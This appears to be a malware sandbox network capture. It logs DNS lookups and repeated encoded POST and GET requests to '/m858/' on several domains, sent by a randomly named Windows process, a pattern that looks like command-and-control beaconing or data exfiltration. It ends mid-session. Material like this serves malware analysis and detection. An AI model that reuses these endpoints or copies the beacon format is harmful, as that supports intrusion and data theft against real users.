Dec 7, 2023 15:56:01.713165998 CET | 1.1.1.1 | 192.168.2.11 | 0xd3de | No error (0) | www.hmoatl.com | hmoatl.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 7, 2023 15:56:01.713165998 CET | 1.1.1.1 | 192.168.2.11 | 0xd3de | No error (0) | hmoatl.com |  | 144.217.103.3 | A (IP address) | IN (0x0001) | false
Dec 7, 2023 15:56:17.407413006 CET | 1.1.1.1 | 192.168.2.11 | 0xda1d | No error (0) | www.633922.com |  | 103.120.80.111 | A (IP address) | IN (0x0001) | false
Dec 7, 2023 15:56:17.407438040 CET | 1.1.1.1 | 192.168.2.11 | 0xda1d | No error (0) | www.633922.com |  | 103.120.80.111 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.11 | 49710 | 84.32.84.32 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 15:52:47.492466927 CET | 443 | OUT | GET /m858/?GJ=C4IdWhJXSFOXR8D&yRV=E3d5DyrEcfJbX1PJB/KGYac5KRSYq3LrneiR+hvnGmPole79cfvMffiwEvZVyE+NwNCm4kMx2S50UNzNVB064navYR89b2jcsA== HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Host: www.ozzventures.shop
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
Dec 7, 2023 15:52:47.668746948 CET | 1286 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: hcdn
                                                                                                                      Date: Thu, 07 Dec 2023 14:52:47 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 10066
                                                                                                                      Connection: close
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      x-hcdn-request-id: 0ce39aac04a2fe7c103429ab1c196754-phx-edge1
                                                                                                                      Expires: Thu, 07 Dec 2023 14:52:46 GMT
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.11 | 49711 | 103.210.56.141 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 15:53:04.260973930 CET | 731 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.fortunetravelsltd.com
                                                                                                                      Origin: http://www.fortunetravelsltd.com
                                                                                                                      Referer: http://www.fortunetravelsltd.com/m858/
                                                                                                                      Content-Length: 184
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Ascii: yRV=URORULOlXrB9jDt7lCeGSNg1w1o1ER2y9PJFOUhrAulqiq7qpQMXgV27mi1D2az5YwKWdfNruuiPh6JB5NPCBMQwP1evjaSSjsB2oHUxCT2j6OZOCevY+wbx++GfGiY/LdFwHEZBP8T04KOxy6TDQSKE8lq3AF2tZyWZfJHmPvw0OhXNEQ==
Dec 7, 2023 15:53:05.381544113 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Connection: close
                                                                                                                      content-type: text/html; charset=UTF-8
                                                                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                      link: <https://fortunetravelsltd.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                      transfer-encoding: chunked
                                                                                                                      content-encoding: br
                                                                                                                      vary: Accept-Encoding
                                                                                                                      date: Thu, 07 Dec 2023 14:53:04 GMT
                                                                                                                      server: LiteSpeed
                                                                                                                      referrer-policy: no-referrer-when-downgrade


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.11 | 49712 | 103.210.56.141 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 15:53:07.189815044 CET | 751 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.fortunetravelsltd.com
                                                                                                                      Origin: http://www.fortunetravelsltd.com
                                                                                                                      Referer: http://www.fortunetravelsltd.com/m858/
                                                                                                                      Content-Length: 204
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Ascii: yRV=URORULOlXrB9iml7pDeGD9g28Vo1Ox379PFFORZ7Hb9qiKLq4i0Xt127uC1GrqzyYwG0dbFruqCPh4BB6+nFBcRWDVet9qSSjsB2oHReCTej6+pOFK7b3QbupOGfCiY7LdETHAQsP+r04K+xyrTMFCKGh1rCP13ScjbNJJjAI6RLGU7eDlZiOuybGMsA0QPyhdRIzM0=
Dec 7, 2023 15:53:09.604619026 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Connection: close
                                                                                                                      content-type: text/html; charset=UTF-8
                                                                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                      link: <https://fortunetravelsltd.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                      transfer-encoding: chunked
                                                                                                                      content-encoding: br
                                                                                                                      vary: Accept-Encoding
                                                                                                                      date: Thu, 07 Dec 2023 14:53:09 GMT
                                                                                                                      server: LiteSpeed
                                                                                                                      referrer-policy: no-referrer-when-downgrade


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.11 | 49713 | 103.210.56.141 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 15:53:10.149862051 CET | 1764 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.fortunetravelsltd.com
                                                                                                                      Origin: http://www.fortunetravelsltd.com
                                                                                                                      Referer: http://www.fortunetravelsltd.com/m858/
                                                                                                                      Content-Length: 1216
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Dec 7, 2023 15:53:11.285235882 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Connection: close
                                                                                                                      content-type: text/html; charset=UTF-8
                                                                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                      link: <https://fortunetravelsltd.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                      transfer-encoding: chunked
                                                                                                                      content-encoding: br
                                                                                                                      vary: Accept-Encoding
                                                                                                                      date: Thu, 07 Dec 2023 14:53:10 GMT
                                                                                                                      server: LiteSpeed
                                                                                                                      referrer-policy: no-referrer-when-downgrade


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      4 | 192.168.2.11 | 49714 | 103.210.56.141 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 7, 2023 15:53:13.075639963 CET | 448 | OUT | GET /m858/?yRV=ZTmxX8apPfF8tkROuhCldKUdm000Pni379NFYx1SML9Ouafr/VkVuzz6gSxjw9bsMzi4V9YgtsvXh5Nq9d6FDvJTGXu41Kek/g==&GJ=C4IdWhJXSFOXR8D HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Host: www.fortunetravelsltd.com
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Dec 7, 2023 15:53:14.152849913 CET | 502 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                      Connection: close
                                                                                                                      content-type: text/html; charset=UTF-8
                                                                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                      x-redirect-by: WordPress
                                                                                                                      location: http://fortunetravelsltd.com/m858/?yRV=ZTmxX8apPfF8tkROuhCldKUdm000Pni379NFYx1SML9Ouafr/VkVuzz6gSxjw9bsMzi4V9YgtsvXh5Nq9d6FDvJTGXu41Kek/g==&GJ=C4IdWhJXSFOXR8D
                                                                                                                      content-length: 0
                                                                                                                      date: Thu, 07 Dec 2023 14:53:13 GMT
                                                                                                                      server: LiteSpeed
                                                                                                                      referrer-policy: no-referrer-when-downgrade


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      5 | 192.168.2.11 | 49716 | 173.231.241.132 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 7, 2023 15:53:19.597227097 CET | 713 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.porousworld.com
                                                                                                                      Origin: http://www.porousworld.com
                                                                                                                      Referer: http://www.porousworld.com/m858/
                                                                                                                      Content-Length: 184
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Ascii: yRV=8Qr8FP/9SVmDArgE3TF78oVROuZ+SPK63z/K0E1xbMGxIF+mtz2I+9FC0NnVV9U4s0w/vNHCtu3krirBmkTuL1zkUfgVNLrNZD1+kLbvt9D1HyiGKcxH2PMyQ0wv6FMfjebSehAfYu/J4GzmC2N1FJrEYbHGUiTj6AElAQ3KxlNZUXmYHg==
                                                                                                                      Dec 7, 2023 15:53:21.424727917 CET | 418 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 14:53:19 GMT
                                                                                                                      Server: Apache
                                                                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                      Link: <https://porousworld.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      6 | 192.168.2.11 | 49717 | 173.231.241.132 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 7, 2023 15:53:22.274213076 CET | 733 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.porousworld.com
                                                                                                                      Origin: http://www.porousworld.com
                                                                                                                      Referer: http://www.porousworld.com/m858/
                                                                                                                      Content-Length: 204
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Ascii: yRV=8Qr8FP/9SVmDBLQE7Qt7o4VOS+Z+bvK+3zjK0Fw0bfixJgam8GCI99FCsdnMLNUFs08ZvN7CtujkrnXBmTvtKlz6c/gXDrrNZD1+kLO6t971EDSGL9xGp/MxZUwv+FMljebgejk5YtHJ4C3mCDt2LJrGcbGsV3q6uxlsASL3nBcQVCKLAbwdWJjkziE1O4AgBKcDzcU=
                                                                                                                      Dec 7, 2023 15:53:23.540599108 CET | 381 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 14:53:22 GMT
                                                                                                                      Server: Apache
                                                                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                      Link: <https://porousworld.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      7 | 192.168.2.11 | 49718 | 173.231.241.132 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 7, 2023 15:53:24.945382118 CET | 1746 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.porousworld.com
                                                                                                                      Origin: http://www.porousworld.com
                                                                                                                      Referer: http://www.porousworld.com/m858/
                                                                                                                      Content-Length: 1216
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Dec 7, 2023 15:53:27.113048077 CET | 418 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 14:53:25 GMT
                                                                                                                      Server: Apache
                                                                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                      Link: <https://porousworld.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      8 | 192.168.2.11 | 49719 | 173.231.241.132 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 7, 2023 15:53:27.617475033 CET | 442 | OUT | GET /m858/?GJ=C4IdWhJXSFOXR8D&yRV=xSDcG6j+Ey2rPqhzwDdzjJVnVNgkT4rk7B/VgGxpF9KJHhiy72u20ZI8z6z+NNUSjVU02PDtrOX7gmvolmuvPl/watolDMLePw== HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Host: www.porousworld.com
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Dec 7, 2023 15:53:29.804791927 CET | 483 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                      Date: Thu, 07 Dec 2023 14:53:27 GMT
                                                                                                                      Server: Apache
                                                                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                      X-Redirect-By: WordPress
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Location: http://porousworld.com/m858/?GJ=C4IdWhJXSFOXR8D&yRV=xSDcG6j+Ey2rPqhzwDdzjJVnVNgkT4rk7B/VgGxpF9KJHhiy72u20ZI8z6z+NNUSjVU02PDtrOX7gmvolmuvPl/watolDMLePw==
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Dec 7, 2023 15:53:29.884135962 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                      Data Ascii: 0


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      9 | 192.168.2.11 | 49720 | 69.57.161.215 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 7, 2023 15:53:35.496639013 CET | 716 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.greenharbor.info
                                                                                                                      Origin: http://www.greenharbor.info
                                                                                                                      Referer: http://www.greenharbor.info/m858/
                                                                                                                      Content-Length: 184
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Ascii: yRV=o1nBT8Q5DuvbYwmuqIiPR0cZLipFMwkRR8CpWjn3jfyg9DCPcF/mz7vZ6b3/WeqA9/xNIwqmO+iRU9ZRb7Tr4S3oUnVc5tsUzlRkheB3Uib4z5Evf6SOcu3TPb/76H2BMH6qagUXih/yHoyc5remPyvF4HvSWUQMxcDy4OJctZqsyFKFZQ==
Dec 7, 2023 15:53:35.790929079 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 14:53:35 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 389
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html
                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.11 | 49721 | 69.57.161.215 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 15:53:38.226535082 CET | 736 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.greenharbor.info
                                                                                                                      Origin: http://www.greenharbor.info
                                                                                                                      Referer: http://www.greenharbor.info/m858/
                                                                                                                      Content-Length: 204
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Ascii: yRV=o1nBT8Q5DuvbZQ2upvOPXUcaSSpFZglaR8+pWiTngtWg9iyPTgTmw7vZ173+IuqL9/NrIxWmO+2RU8pRbNbq3i3qB3Vem9sUzlRkheUgUiD4zIUvfeGNAe3QZr/7+H2FMH6IakU9ijHyHpCc6+q5BCvD2nuQdm1886qmoN59lcz/3QmWeu8OE1T4XyCxamF6Exb0bhA=
Dec 7, 2023 15:53:38.520930052 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 14:53:38 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 389
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html
                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.11 | 49722 | 69.57.161.215 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 15:53:40.965720892 CET | 1749 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.greenharbor.info
                                                                                                                      Origin: http://www.greenharbor.info
                                                                                                                      Referer: http://www.greenharbor.info/m858/
                                                                                                                      Content-Length: 1216
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
Dec 7, 2023 15:53:41.255520105 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 14:53:41 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 389
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html
                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.11 | 49723 | 69.57.161.215 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 15:53:43.694645882 CET | 443 | OUT | GET /m858/?yRV=l3PhQIcXSIPbTWu7p/uiREsJUVtNOEFcSOOLMhvnuN6H7BalBQjl+86I6Nr3Qdue789gEwulMvGUQuhGePztwTHWY2ExuMUqrQ==&GJ=C4IdWhJXSFOXR8D HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Host: www.greenharbor.info
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
Dec 7, 2023 15:53:43.992939949 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 14:53:43 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 389
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.11 | 49724 | 194.58.112.174 | 80 | 2016 | C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 15:53:49.709655046 CET | 716 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.lets-room.online
                                                                                                                      Origin: http://www.lets-room.online
                                                                                                                      Referer: http://www.lets-room.online/m858/
                                                                                                                      Content-Length: 184
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Ascii: yRV=DRV3MuCdLTXa90Eo2+yQrk2CXg+ACAaZW5abZ8A1PZTcxeN/Em8Kk2pKlqB40ae4WUQnh8xVrt5INfwqzumqft5jopN3CZ+kzz68oC4HaSqcl/b2YPSBerDCTRBoomO494XQKOZFIjn6a6Bu68Rm/x4BmbSv2TeA6Beprn4B4ySnDuwVTg==
Dec 7, 2023 15:53:49.994836092 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
